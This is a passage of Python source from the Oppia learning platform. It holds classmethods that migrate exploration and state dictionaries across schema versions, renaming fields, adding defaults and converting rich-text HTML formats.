default_outcome = None
for handler in interaction['handlers']:
# Ensure the name is 'submit'.
if 'name' in handler and handler['name'] != 'submit':
raise utils.ExplorationConversionError(
'Error: Can only convert rules with a name '
'\'submit\' in states v3 to v4 conversion process. '
'Encountered name: %s' % handler['name'])
# Each rule spec becomes a new answer group.
for rule_spec in handler['rule_specs']:
group = {}
# Rules don't have a rule_type key anymore.
is_default_rule = False
if 'rule_type' in rule_spec['definition']:
rule_type = rule_spec['definition']['rule_type']
is_default_rule = (rule_type == 'default')
# Ensure the rule type is either default or atomic.
if not is_default_rule and rule_type != 'atomic':
raise utils.ExplorationConversionError(
'Error: Can only convert default and atomic '
'rules in states v3 to v4 conversion process. '
'Encountered rule of type: %s' % rule_type)
# Ensure the subject is answer.
if ('subject' in rule_spec['definition'] and
rule_spec['definition']['subject'] != 'answer'):
raise utils.ExplorationConversionError(
'Error: Can only convert rules with an \'answer\' '
'subject in states v3 to v4 conversion process. '
'Encountered subject: %s'
% rule_spec['definition']['subject'])
# The rule turns into the group's only rule. Rules do not
# have definitions anymore. Do not copy the inputs and name
# if it is a default rule.
if not is_default_rule:
definition = rule_spec['definition']
group['rule_specs'] = [{
'inputs': copy.deepcopy(definition['inputs']),
'rule_type': copy.deepcopy(definition['name'])
}]
# Answer groups now have an outcome.
group['outcome'] = {
'dest': copy.deepcopy(rule_spec['dest']),
'feedback': copy.deepcopy(rule_spec['feedback']),
'param_changes': (
copy.deepcopy(rule_spec['param_changes'])
if 'param_changes' in rule_spec else [])
}
if is_default_rule:
default_outcome = group['outcome']
else:
answer_groups.append(group)
try:
is_terminal = (
interaction_registry.Registry.get_interaction_by_id(
interaction['id']
).is_terminal if interaction['id'] is not None else False)
except KeyError:
raise utils.ExplorationConversionError(
'Trying to migrate exploration containing non-existent '
'interaction ID: %s' % interaction['id'])
if not is_terminal:
interaction['answer_groups'] = answer_groups
interaction['default_outcome'] = default_outcome
else:
# Terminal nodes have no answer groups or outcomes.
interaction['answer_groups'] = []
interaction['default_outcome'] = None
del interaction['handlers']
return states_dict
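    # Illustrative sketch of the v3 -> v4 migration above (abridged,
    # hypothetical values): a v3 handler rule spec such as
    #
    #     {'definition': {'rule_type': 'atomic', 'name': 'Equals',
    #                     'subject': 'answer', 'inputs': {'x': 5}},
    #      'dest': 'Next', 'feedback': ['Good!'], 'param_changes': []}
    #
    # becomes a v4 answer group of the form
    #
    #     {'rule_specs': [{'rule_type': 'Equals', 'inputs': {'x': 5}}],
    #      'outcome': {'dest': 'Next', 'feedback': ['Good!'],
    #                  'param_changes': []}}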
@classmethod
def _convert_states_v4_dict_to_v5_dict(cls, states_dict):
"""Converts from version 4 to 5. Version 5 removes the triggers list
within interactions, and replaces it with a fallbacks list.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
        # Ensure all state interactions have a fallbacks list.
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if 'triggers' in interaction:
del interaction['triggers']
if 'fallbacks' not in interaction:
interaction['fallbacks'] = []
return states_dict
@classmethod
def _convert_states_v5_dict_to_v6_dict(cls, states_dict):
"""Converts from version 5 to 6. Version 6 introduces a list of
confirmed unclassified answers. Those are answers which are confirmed
to be associated with the default outcome during classification.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if 'confirmed_unclassified_answers' not in interaction:
interaction['confirmed_unclassified_answers'] = []
return states_dict
@classmethod
def _convert_states_v6_dict_to_v7_dict(cls, states_dict):
"""Converts from version 6 to 7. Version 7 forces all CodeRepl
interactions to use Python.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if interaction['id'] == 'CodeRepl':
interaction['customization_args']['language']['value'] = (
'python')
return states_dict
# TODO(bhenning): Remove pre_v4_states_conversion_func when the answer
# migration is completed.
@classmethod
def _convert_states_v7_dict_to_v8_dict(cls, states_dict):
"""Converts from version 7 to 8. Version 8 contains classifier
model id.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_dict['classifier_model_id'] = None
return states_dict
@classmethod
def _convert_states_v8_dict_to_v9_dict(cls, states_dict):
"""Converts from version 8 to 9. Version 9 contains 'correct'
field in answer groups.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['correct'] = False
return states_dict
@classmethod
def _convert_states_v9_dict_to_v10_dict(cls, states_dict):
"""Converts from version 9 to 10. Version 10 contains hints
and solution in each interaction.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if 'hints' not in interaction:
interaction['hints'] = []
for fallback in interaction['fallbacks']:
if fallback['outcome']['feedback']:
interaction['hints'].append({
'hint_text': fallback['outcome']['feedback'][0]
})
if 'solution' not in interaction:
interaction['solution'] = None
return states_dict
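    # Illustrative sketch of the v9 -> v10 migration above (hypothetical
    # values): a fallback whose outcome feedback is ['Try again'] produces
    # the hint {'hint_text': 'Try again'}; fallbacks with empty feedback add
    # no hint, and 'solution' defaults to None when absent.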
@classmethod
def _convert_states_v10_dict_to_v11_dict(cls, states_dict):
"""Converts from version 10 to 11. Version 11 refactors the content to
be an HTML string with audio translations.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
content_html = state_dict['content'][0]['value']
state_dict['content'] = {
'html': content_html,
'audio_translations': []
}
return states_dict
@classmethod
def _convert_states_v11_dict_to_v12_dict(cls, states_dict):
"""Converts from version 11 to 12. Version 12 refactors audio
translations from a list to a dict keyed by language code.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
old_audio_translations = state_dict['content']['audio_translations']
state_dict['content']['audio_translations'] = {
old_translation['language_code']: {
'filename': old_translation['filename'],
'file_size_bytes': old_translation['file_size_bytes'],
'needs_update': old_translation['needs_update'],
}
for old_translation in old_audio_translations
}
return states_dict
@classmethod
def _convert_states_v12_dict_to_v13_dict(cls, states_dict):
"""Converts from version 12 to 13. Version 13 sets empty
solutions to None and removes fallbacks.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if 'fallbacks' in state_dict['interaction']:
del state_dict['interaction']['fallbacks']
if not state_dict['interaction']['solution']:
state_dict['interaction']['solution'] = None
return states_dict
@classmethod
def _convert_states_v13_dict_to_v14_dict(cls, states_dict):
"""Converts from version 13 to 14. Version 14 adds
audio translations to feedback, hints, and solutions.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['default_outcome'] is not None:
old_feedback_list = (
state_dict['interaction']['default_outcome']['feedback'])
default_feedback_html = (
old_feedback_list[0] if len(old_feedback_list) > 0 else '')
state_dict['interaction']['default_outcome']['feedback'] = {
'html': default_feedback_html,
'audio_translations': {}
}
for answer_group_dict in state_dict['interaction']['answer_groups']:
old_answer_group_feedback_list = (
answer_group_dict['outcome']['feedback'])
feedback_html = (
old_answer_group_feedback_list[0]
if len(old_answer_group_feedback_list) > 0 else '')
answer_group_dict['outcome']['feedback'] = {
'html': feedback_html,
'audio_translations': {}
}
for hint_dict in state_dict['interaction']['hints']:
hint_content_html = hint_dict['hint_text']
del hint_dict['hint_text']
hint_dict['hint_content'] = {
'html': hint_content_html,
'audio_translations': {}
}
if state_dict['interaction']['solution']:
explanation = (
state_dict['interaction']['solution']['explanation'])
state_dict['interaction']['solution']['explanation'] = {
'html': explanation,
'audio_translations': {}
}
return states_dict
@classmethod
def _convert_states_v14_dict_to_v15_dict(cls, states_dict):
"""Converts from version 14 to 15. Version 15 renames the "correct"
field in answer groups to "labelled_as_correct" and (for safety) resets
all "labelled_as_correct" values to False.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['labelled_as_correct'] = False
del answer_group['correct']
return states_dict
@classmethod
def _convert_states_v15_dict_to_v16_dict(cls, states_dict):
"""Converts from version 15 to 16. Version 16 adds a
refresher_exploration_id field to each outcome.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['outcome']['refresher_exploration_id'] = None
if state_dict['interaction']['default_outcome'] is not None:
default_outcome = state_dict['interaction']['default_outcome']
default_outcome['refresher_exploration_id'] = None
return states_dict
@classmethod
def _convert_states_v16_dict_to_v17_dict(cls, states_dict):
"""Converts from version 16 to 17. Version 17 moves the
labelled_as_correct field to the outcome dict (so that it also appears
for the default outcome) and adds two new customization args to
FractionInput interactions.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['outcome']['labelled_as_correct'] = (
answer_group['labelled_as_correct'])
del answer_group['labelled_as_correct']
default_outcome = state_dict['interaction']['default_outcome']
if default_outcome is not None:
default_outcome['labelled_as_correct'] = False
if state_dict['interaction']['id'] == 'FractionInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'allowImproperFraction': {
'value': True
},
'allowNonzeroIntegerPart': {
'value': True
}
})
return states_dict
@classmethod
def _convert_states_v17_dict_to_v18_dict(cls, states_dict):
"""Converts from version 17 to 18. Version 18 adds a new
customization arg to FractionInput interactions which allows
you to add custom placeholders.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['id'] == 'FractionInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'customPlaceholder': {
'value': ''
}
})
return states_dict
@classmethod
def _convert_states_v18_dict_to_v19_dict(cls, states_dict):
"""Converts from version 18 to 19. Version 19 adds training_data
parameter to each answer group to store training data of that
answer group.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_group_indexes_to_preserve = []
answer_groups = state_dict['interaction']['answer_groups']
for answer_group_index, answer_group in enumerate(answer_groups):
if answer_group['rule_specs']:
training_data = []
classifier_rule_index = None
rule_specs = answer_group['rule_specs']
for rule_index, rule in enumerate(rule_specs):
if rule['rule_type'] == 'FuzzyMatches':
training_data = rule['inputs']['training_data']
classifier_rule_index = rule_index
break
if classifier_rule_index is not None:
answer_group['rule_specs'].pop(classifier_rule_index)
answer_group['training_data'] = training_data
if training_data or answer_group['rule_specs']:
answer_group_indexes_to_preserve.append(
answer_group_index)
preserved_answer_groups = []
for answer_group_index in answer_group_indexes_to_preserve:
preserved_answer_groups.append(
answer_groups[answer_group_index])
state_dict['interaction']['answer_groups'] = preserved_answer_groups
return states_dict
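    # Illustrative sketch of the v18 -> v19 migration above (hypothetical
    # values): an answer group whose rule_specs contain a 'FuzzyMatches' rule
    # with inputs {'training_data': ['yes', 'yep']} loses that rule and gains
    # a top-level 'training_data': ['yes', 'yep'] field; an answer group left
    # with neither rule specs nor training data is dropped entirely.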
@classmethod
def _convert_states_v19_dict_to_v20_dict(cls, states_dict):
"""Converts from version 19 to 20. Version 20 adds
tagged_misconception field to answer groups and
missing_prerequisite_skill_id field to outcomes.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['outcome']['missing_prerequisite_skill_id'] = None
answer_group['tagged_misconception_id'] = None
default_outcome = state_dict['interaction']['default_outcome']
if default_outcome is not None:
default_outcome['missing_prerequisite_skill_id'] = None
return states_dict
@classmethod
def _convert_states_v20_dict_to_v21_dict(cls, states_dict):
"""Converts from version 20 to 21. Version 21 moves audio_translations
from SubtitledHTML to content_ids_to_audio_translations.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
content_ids_to_audio_translations = {}
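            # Each translatable piece of a state gets a deterministic content
            # id: 'content', 'feedback_<n>' per answer group,
            # 'default_outcome', 'hint_<n>' per hint and 'solution'. The
            # audio translations are moved under these keys.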
content_id = 'content'
content_ids_to_audio_translations[content_id] = (
state_dict['content'].pop('audio_translations'))
state_dict['content']['content_id'] = content_id
for index, answer_group in enumerate(
state_dict['interaction']['answer_groups']):
content_id = 'feedback_' + python_utils.convert_to_bytes(
index + 1)
content_ids_to_audio_translations[content_id] = (
answer_group['outcome']['feedback'].pop(
'audio_translations'))
answer_group['outcome']['feedback']['content_id'] = content_id
if state_dict['interaction']['default_outcome']:
default_outcome = state_dict['interaction']['default_outcome']
content_id = 'default_outcome'
content_ids_to_audio_translations[content_id] = (
default_outcome['feedback'].pop('audio_translations'))
default_outcome['feedback']['content_id'] = (content_id)
for index, hint in enumerate(state_dict['interaction']['hints']):
content_id = 'hint_' + python_utils.convert_to_bytes(index + 1)
content_ids_to_audio_translations[content_id] = (
hint['hint_content'].pop('audio_translations'))
hint['hint_content']['content_id'] = content_id
if state_dict['interaction']['solution']:
solution = state_dict['interaction']['solution']
content_id = 'solution'
content_ids_to_audio_translations[content_id] = (
solution['explanation'].pop('audio_translations'))
solution['explanation']['content_id'] = content_id
state_dict['content_ids_to_audio_translations'] = (
content_ids_to_audio_translations)
return states_dict
@classmethod
def _convert_states_v21_dict_to_v22_dict(cls, states_dict):
"""Converts from version 21 to 22. Version 22 converts all Rich Text
Editor content to be compatible with the textAngular format.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict, html_validation_service.convert_to_textangular)
return states_dict
@classmethod
def _convert_states_v22_dict_to_v23_dict(cls, states_dict):
"""Converts from version 22 to 23. Version 23 ensures that all
all oppia-noninteractive-image tags have caption attribute.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict, html_validation_service.add_caption_attr_to_image)
return states_dict
@classmethod
def _convert_states_v23_dict_to_v24_dict(cls, states_dict):
"""Converts from version 23 to 24. Version 24 converts all Rich Text
Editor content to be compatible with the CKEditor format.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict, html_validation_service.convert_to_ckeditor)
return states_dict
@classmethod
def _convert_states_v24_dict_to_v25_dict(cls, exp_id, states_dict):
"""Converts from version 24 to 25. Version 25 adds the dimensions of
images in the oppia-noninteractive-image tags.
Args:
exp_id: str. ID of the exploration.
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for key, state_dict in states_dict.items():
add_dimensions_to_image_tags = functools.partial(
html_validation_service.add_dimensions_to_image_tags, # pylint: disable=line-too-long
exp_id)
states_dict[key] = state_domain.State.convert_html_fields_in_state(
state_dict,
add_dimensions_to_image_tags)
if state_dict['interaction']['id'] == 'ImageClickInput':
filename = state_dict['interaction']['customization_args'][
'imageAndRegions']['value']['imagePath']
state_dict['interaction']['customization_args'][
'imageAndRegions']['value']['imagePath'] = (
html_validation_service.get_filename_with_dimensions(
filename, exp_id))
return states_dict
@classmethod
def _convert_states_v25_dict_to_v26_dict(cls, states_dict):
"""Converts from version 25 to 26. Version 26 adds a new
customization arg to DragAndDropSortInput interaction which allows
multiple sort items in the same position.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['id'] == 'DragAndDropSortInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'allowMultipleItemsInSamePosition': {
'value': False
}
})
return states_dict
@classmethod
def _convert_states_v26_dict_to_v27_dict(cls, states_dict):
"""Converts from version 26 to 27. Version 27 adds written_translations
dict to the state, which will allow translators to add translation
script for the state contents.
        NOTE: This migration also filters out extra content ids from
        content_ids_to_audio_translations so that the state passes the new
        validation check. The earlier state validation only checked that the
        set of all content ids present within the state is a subset of the
        content_ids_to_audio_translations keys, but the new validation checks
        that both sets are equal.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_content_id_list = []
# Add state card's content id into the state_content_id_list.
state_content_id_list.append(state_dict['content']['content_id'])
# Add answer_groups content id into the state_content_id_list.
for answer_group in state_dict['interaction']['answer_groups']:
answer_feedback = answer_group['outcome']['feedback']
state_content_id_list.append(answer_feedback['content_id'])
# If present, add default_outcome content id into
# state_content_id_list.
default_outcome = state_dict['interaction']['default_outcome']
if default_outcome is not None:
state_content_id_list.append(
default_outcome['feedback']['content_id'])
# Add hints content id into state_content_id_list.
for hint in state_dict['interaction']['hints']:
state_content_id_list.append(hint['hint_content']['content_id'])
# If present, add solution content id into state_content_id_list.
solution = state_dict['interaction']['solution']
if solution:
state_content_id_list.append(
solution['explanation']['content_id'])
# Filter content_ids_to_audio_translations with unwanted content id.
# These are the extra content id present within the
# content_ids_to_audio_translations dict which is of no use as html
# linked to these content_ids are not available in the state.
citat = state_dict['content_ids_to_audio_translations']
extra_content_ids_in_citat = (
set(citat.keys()) - set(state_content_id_list))
for content_id in extra_content_ids_in_citat:
state_dict['content_ids_to_audio_translations'].pop(content_id)
# Create written_translations using the state_content_id_list.
translations_mapping = {}
for content_id in state_content_id_list:
translations_mapping[content_id] = {}
state_dict['written_translations'] = {}
state_dict['written_translations']['translations_mapping'] = (
translations_mapping)
return states_dict
@classmethod
def _convert_states_v27_dict_to_v28_dict(cls, states_dict):
"""Converts from version 27 to 28. Version 28 replaces
content_ids_to_audio_translations with recorded_voiceovers.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_dict['recorded_voiceovers'] = {
'voiceovers_mapping': (
state_dict.pop('content_ids_to_audio_translations'))
}
return states_dict
@classmethod
def _convert_states_v28_dict_to_v29_dict(cls, states_dict):
"""Converts from version 28 to 29. Version 29 adds
solicit_answer_details boolean variable to the state, which
allows the creator to ask for answer details from the learner
about why they landed on a particular answer.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_dict['solicit_answer_details'] = False
return states_dict
@classmethod
def _convert_states_v29_dict_to_v30_dict(cls, states_dict):
"""Converts from version 29 to 30. Version 30 replaces
tagged_misconception_id with tagged_skill_misconception_id, which
contains the skill id and misconception id of the tagged misconception,
connected by '-'.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['tagged_skill_misconception_id'] = None
del answer_group['tagged_misconception_id']
return states_dict
@classmethod
def _convert_states_v30_dict_to_v31_dict(cls, states_dict):
"""Converts from version 30 to 31. Version 31 updates the
Voiceover model to have an initialized duration_secs attribute
of 0.0. This will be updated when a new mp3 audio file is uploaded
for the exploration.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
# Get the voiceovers_mapping metadata.
voiceovers_mapping = (state_dict['recorded_voiceovers']
['voiceovers_mapping'])
language_codes_to_audio_metadata = voiceovers_mapping.values()
for language_codes in language_codes_to_audio_metadata:
for audio_metadata in language_codes.values():
# Initialize duration_secs with 0.0 for every voiceover
# recording under Content, Feedback, Hints, and Solutions.
# This is necessary to keep the state functional
# when migrating to v31.
audio_metadata['duration_secs'] = 0.0
return states_dict
@classmethod
def _convert_states_v31_dict_to_v32_dict(cls, states_dict):
"""Converts from version 31 to 32. Version 32 adds a new
customization arg to SetInput interaction which allows
creators to add custom text to the "Add" button.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['id'] == 'SetInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'buttonText': {
'value': 'Add item'
}
})
return states_dict
@classmethod
def update_states_from_model(
cls, versioned_exploration_states, current_states_schema_version,
exploration_id):
"""Converts the states blob contained in the given
versioned_exploration_states dict from current_states_schema_version to
current_states_schema_version + 1.
Note that the versioned_exploration_states being passed in is modified
in-place.
Args:
versioned_exploration_states: dict. A dict with two keys:
- states_schema_version: int. The states schema version for the
exploration.
- states: dict. The dict of states comprising the exploration.
The keys are state names and the values are dicts used to
initialize a State domain object.
current_states_schema_version: int. The current states
schema version.
exploration_id: str. ID of the exploration.
"""
versioned_exploration_states['states_schema_version'] = (
current_states_schema_version + 1)
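        # The conversion function is looked up dynamically by name, e.g.
        # schema version 20 maps to cls._convert_states_v20_dict_to_v21_dict.
        # The v24 -> v25 converter additionally needs the exploration id, so
        # it is wrapped with functools.partial below.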
conversion_fn = getattr(cls, '_convert_states_v%s_dict_to_v%s_dict' % (
current_states_schema_version, current_states_schema_version + 1))
if current_states_schema_version == 24:
conversion_fn = functools.partial(conversion_fn, exploration_id)
versioned_exploration_states['states'] = conversion_fn(
versioned_exploration_states['states'])
# The current version of the exploration YAML schema. If any backward-
# incompatible changes are made to the exploration schema in the YAML
# definitions, this version number must be changed and a migration process
# put in place.
CURRENT_EXP_SCHEMA_VERSION = 37
LAST_UNTITLED_SCHEMA_VERSION = 9
@classmethod
def _convert_v1_dict_to_v2_dict(cls, exploration_dict):
"""Converts a v1 exploration dict into a v2 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v1.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v2.
"""
exploration_dict['schema_version'] = 2
exploration_dict['init_state_name'] = (
exploration_dict['states'][0]['name'])
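        # Re-key the list of states by state name and drop the now-redundant
        # 'name' field from each state dict.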
states_dict = {}
for state in exploration_dict['states']:
states_dict[state['name']] = state
del states_dict[state['name']]['name']
exploration_dict['states'] = states_dict
return exploration_dict
@classmethod
def _convert_v2_dict_to_v3_dict(cls, exploration_dict):
"""Converts a v2 exploration dict into a v3 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v2.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v3.
"""
exploration_dict['schema_version'] = 3
exploration_dict['objective'] = ''
exploration_dict['language_code'] = constants.DEFAULT_LANGUAGE_CODE
exploration_dict['skill_tags'] = []
exploration_dict['blurb'] = ''
exploration_dict['author_notes'] = ''
return exploration_dict
@classmethod
def _convert_v3_dict_to_v4_dict(cls, exploration_dict):
"""Converts a v3 exploration dict into a v4 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v3.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v4.
"""
exploration_dict['schema_version'] = 4
for _, state_defn in exploration_dict['states'].items():
state_defn['interaction'] = copy.deepcopy(state_defn['widget'])
state_defn['interaction']['id'] = copy.deepcopy(
state_defn['interaction']['widget_id'])
del state_defn['interaction']['widget_id']
del state_defn['interaction']['sticky']
del state_defn['widget']
return exploration_dict
@classmethod
def _convert_v4_dict_to_v5_dict(cls, exploration_dict):
"""Converts a v4 exploration dict into a v5 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v4.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v5.
"""
exploration_dict['schema_version'] = 5
# Rename the 'skill_tags' field to 'tags'.
exploration_dict['tags'] = exploration_dict['skill_tags']
del exploration_dict['skill_tags']
exploration_dict['skin_customizations'] = {
'panels_contents': {
'bottom': [],
'left': [],
'right': []
}
}
return exploration_dict
@classmethod
def _convert_v5_dict_to_v6_dict(cls, exploration_dict):
"""Converts a v5 exploration dict into a v6 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v5.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v6.
"""
exploration_dict['schema_version'] = 6
# Ensure this exploration is up-to-date with states schema v3.
exploration_dict['states'] = cls._convert_states_v0_dict_to_v1_dict(
exploration_dict['states'])
exploration_dict['states'] = cls._convert_states_v1_dict_to_v2_dict(
exploration_dict['states'])
exploration_dict['states'] = cls._convert_states_v2_dict_to_v3_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 3
return exploration_dict
@classmethod
def _convert_v6_dict_to_v7_dict(cls, exploration_dict):
"""Converts a v6 exploration dict into a v7 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v6.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v7.
"""
exploration_dict['schema_version'] = 7
# Ensure this exploration is up-to-date with states schema v4.
exploration_dict['states'] = cls._convert_states_v3_dict_to_v4_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 4
return exploration_dict
@classmethod
def _convert_v7_dict_to_v8_dict(cls, exploration_dict):
"""Converts a v7 exploration dict into a v8 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v7.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v8.
"""
exploration_dict['schema_version'] = 8
# Ensure this exploration is up-to-date with states schema v5.
exploration_dict['states'] = cls._convert_states_v4_dict_to_v5_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 5
return exploration_dict
@classmethod
def _convert_v8_dict_to_v9_dict(cls, exploration_dict):
"""Converts a v8 exploration dict into a v9 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v8.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v9.
"""
exploration_dict['schema_version'] = 9
# Ensure this exploration is up-to-date with states schema v6.
exploration_dict['states'] = cls._convert_states_v5_dict_to_v6_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 6
return exploration_dict
@classmethod
def _convert_v9_dict_to_v10_dict(cls, exploration_dict, title, category):
"""Converts a v9 exploration dict into a v10 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v9.
title: str. The exploration title.
category: str. The exploration category.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v10.
"""
exploration_dict['schema_version'] = 10
        # From v10 onwards, the title and category are stored in the YAML
        # file.
exploration_dict['title'] = title
exploration_dict['category'] = category
# Remove the 'default_skin' property.
del exploration_dict['default_skin']
# Upgrade all gadget panel customizations to have exactly one empty
# bottom panel. This is fine because, for previous schema versions,
# gadgets functionality had not been released yet.
exploration_dict['skin_customizations'] = {
'panels_contents': {
'bottom': [],
}
}
# Ensure this exploration is up-to-date with states schema v7.
exploration_dict['states'] = cls._convert_states_v6_dict_to_v7_dict(
exploration_dict['states'])
# Update the states schema version to reflect the above conversions to
# the states dict.
exploration_dict['states_schema_version'] = 7
return exploration_dict
@classmethod
def _convert_v10_dict_to_v11_dict(cls, exploration_dict):
"""Converts a v10 exploration dict into a v11 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v10.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v11.
"""
exploration_dict['schema_version'] = 11
exploration_dict['states'] = cls._convert_states_v7_dict_to_v8_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 8
return exploration_dict
@classmethod
def _convert_v11_dict_to_v12_dict(cls, exploration_dict):
"""Converts a v11 exploration dict into a v12 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v11.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v12.
"""
exploration_dict['schema_version'] = 12
exploration_dict['states'] = cls._convert_states_v8_dict_to_v9_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 9
return exploration_dict
@classmethod
def _convert_v12_dict_to_v13_dict(cls, exploration_dict):
"""Converts a v12 exploration dict into a v13 exploration dict.
Args:
